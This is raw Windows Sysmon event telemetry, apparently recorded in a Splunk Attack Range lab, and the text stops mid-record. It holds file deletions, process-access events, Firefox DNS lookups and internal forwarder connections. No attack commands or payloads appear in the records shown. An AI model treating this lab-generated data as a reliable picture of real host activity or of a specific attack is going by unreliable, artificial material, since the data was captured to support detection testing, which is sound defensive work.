Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\2752s6y5.default-release\cache2\doomed\3088MD5=1602624EEAA765D0D57547167FC77B4E,SHA256=6DBF4EEB4E45538E44E6494540B1C2643743AE5B5B8739D23EED1003069E222F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:03.680{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E2E1733BF54E19A5E534953F04F5AC2,SHA256=5A0AB40BB8A5F32FE082B26382ECEFA828BE9776E9E1468F8C99C2D306C222CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:03.612{FE4C2B44-D9F5-63C7-0D00-00000000AF02}8927064C:\Windows\system32\svchost.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3ca94|c:\windows\system32\rpcss.dll+29447|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016783Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:03.569{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7314EB568888286A968CC937A2F44216,SHA256=6D69BC4E6D5A05F30D56565C5EBB89DC5FDB67F2DC75A6F24C2AD655F349F0F7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:04.962{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892300C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+5bee|C:\Windows\SYSTEM32\ntdll.dll+3a950|C:\Windows\SYSTEM32\ntdll.dll+1e87f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:04.666{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1F0E036CC8A231B049BAF04C2EBC4F9,SHA256=BDAA1AE51F2ECF7FBAD8F1328FA988964D434472C2F0F4CD5ED5493E932A3B6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016785Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:04.620{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22D331E5FFED7C5C19DA21F9F711E06F,SHA256=3D696F3F8BDF30EAF333A9236D4A7D7CCCD12CE929EB51D33BA7FD29178B5076,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000043925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.424{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60450- 354300x800000000000000043924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.423{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local60995- 354300x800000000000000043923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.423{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64019- 354300x800000000000000043922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.423{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63268- 354300x800000000000000043921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.421{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63480- 23542300x800000000000000016784Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:04.079{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B7E616F96B7BBFB82BF7130F79C861FF,SHA256=784F4924BD8FD182C26EA63E1A41C4AA6BD4EA85FEA6DA0417976E9A8570384D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043952Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:05.747{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77F40BD93FC8A7DE101AED42AFEDCB81,SHA256=7A0BE9FBEB4988204D2537A15927B8BD9A79E655708D95DEB1F9E1D14C10677F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016787Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:05.697{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A7B68230249A362F25E1200572E676,SHA256=41CDEA7E59A31269421DE628B17ADDAA07FB417A8D023A3B395785E96BAA493D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000016786Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:03.943{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50109-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8089- 22542200x800000000000000043951Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.437{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240reddit.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.436{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240reddit.map.fastly.net0151.101.145.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.436{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240star-mini.c10r.facebook.com02a03:2880:f103:181:face:b00c:0:25de;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.436{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.reddit.com0type: 5 reddit.map.fastly.net;::ffff:151.101.145.140;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.436{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240twitter.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.436{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240twitter.com0104.244.42.1;104.244.42.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.436{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240twitter.com0::ffff:104.244.42.193;::ffff:104.244.42.1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240dyna.wikimedia.org02620:0:861:ed1a::1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240dyna.wikimedia.org0208.80.154.224;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.wikipedia.org0type: 5 dyna.wikimedia.org;::ffff:208.80.154.224;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240d3ag4hukkh62yn.cloudfront.net02600:9000:24f7:9400:7:49a5:5fd2:8621;2600:9000:24f7:3800:7:49a5:5fd2:8621;2600:9000:24f7:6000:7:49a5:5fd2:8621;2600:9000:24f7:7400:7:49a5:5fd2:8621;2600:9000:24f7:ba00:7:49a5:5fd2:8621;2600:9000:24f7:600:7:49a5:5fd2:8621;2600:9000:24f7:2c00:7:49a5:5fd2:8621;2600:9000:24f7:6200:7:49a5:5fd2:8621;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240e14801.x.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240d3ag4hukkh62yn.cloudfront.net0108.156.173.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240e14801.x.akamaiedge.net072.246.21.26;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.435{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240star-mini.c10r.facebook.com031.13.66.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.434{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.amazon.com0type: 5 tp.47cf2c8c9-frontier.amazon.com;type: 5 d3ag4hukkh62yn.cloudfront.net;::ffff:108.156.173.234;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.434{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.homedepot.com0type: 5 www.homedepot.com.edgekey.net;type: 5 e14801.x.akamaiedge.net;::ffff:72.246.21.26;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.434{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.facebook.com0type: 5 star-mini.c10r.facebook.com;::ffff:31.13.66.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.434{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240youtube-ui.l.google.com02607:f8b0:4009:819::200e;2607:f8b0:4009:807::200e;2607:f8b0:4009:817::200e;2607:f8b0:4009:818::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.434{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240youtube-ui.l.google.com0142.250.190.14;142.250.190.46;142.250.190.78;142.250.190.110;172.217.0.174;172.217.1.110;172.217.2.46;172.217.4.46;172.217.4.78;172.217.4.206;142.250.191.110;142.250.191.142;142.250.191.174;142.250.191.206;142.250.191.238;142.251.32.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.433{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.youtube.com0type: 5 youtube-ui.l.google.com;::ffff:142.251.32.14;::ffff:142.250.190.14;::ffff:142.250.190.46;::ffff:142.250.190.78;::ffff:142.250.190.110;::ffff:172.217.0.174;::ffff:172.217.1.110;::ffff:172.217.2.46;::ffff:172.217.4.46;::ffff:172.217.4.78;::ffff:172.217.4.206;::ffff:142.250.191.110;::ffff:142.250.191.142;::ffff:142.250.191.174;::ffff:142.250.191.206;::ffff:142.250.191.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.433{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240pdf-suite.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.433{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240pdf-suite.com064.15.159.239;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000043928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:02.433{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240www.pdf-suite.com0type: 5 pdf-suite.com;::ffff:64.15.159.239;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x800000000000000043953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:06.847{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=698BC3108519110DF7893F625D2BE4F6,SHA256=22317B0AFBCE4B8CF3E441ABEA1991DF9FF0E1994C796DFD2E4C4A42203DE2ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016788Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:06.778{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5778FA6312417BBEBD1A7C1F6658DC2C,SHA256=D80E824E6B6E6F090074A375BC9F73E9A7377129283A9EFE51A7C50FF1C6D238,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016790Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:07.885{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=243F9D494495BB423A3175C8CADCEB19,SHA256=1F7D7AEEF67F979A301E0B509B2113313875166BD235943F762B2A8182416FAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:07.931{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20D12237539A7D6287F817E0448E0C14,SHA256=AB9C21C6F33C22500039F29EC0452A55B0636FED82DCE8A19D59D1E0C5C6DC9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000043954Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:04.645{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56363-false10.0.1.12-8000- 354300x800000000000000016789Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:06.124{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50110-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000016791Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:08.967{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FC5CAEEF84B70F412BF79C455E5283D,SHA256=FCA25E0CB8A0615A8DC8BFD11B5F56556338032FD11DF5CD0CC43412168F2810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:09.049{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4414504C3D20505B331448BE8E0929D5,SHA256=F0120690EA7588E81FDC38B13A3946CACF62E5B832A18EC9A79ED7743C241BFA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016793Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:10.997{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-034MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000016792Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:10.059{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3114C59C2047ABA8C67CFCCBFC6A9B4,SHA256=B5A57B223F2AF728F0036EF24536304139528A92CE65877004DF7B5D0D6B6521,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000043962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:23:10.832{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\6335A056-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_6335A056-0000-0000-0000-100000000000.XML 13241300x800000000000000043961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:23:10.816{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B\Config SourceDWORD (0x00000001) 13241300x800000000000000043960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:23:10.816{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_ADB99FA2-9D1A-4D48-BBCB-43A33DB3514B.XML 10341000x800000000000000043959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.816{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.816{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:10.116{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1BCF25E71447E9889BCAA6339402907,SHA256=47A1226FA2AE92FE9ABD4A4ABC37456985682F20FD4B0EF2A759AD418E538CA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016794Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:11.143{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BAA98B29AFA8937BD770DC7A796B8E0,SHA256=08CFA7BA6DEB13C94445E3764DBA25F85B189B585150A11B439CBA6486C10D31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000043997Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.904{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038610) 10341000x800000000000000043996Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:11.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60686104C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program 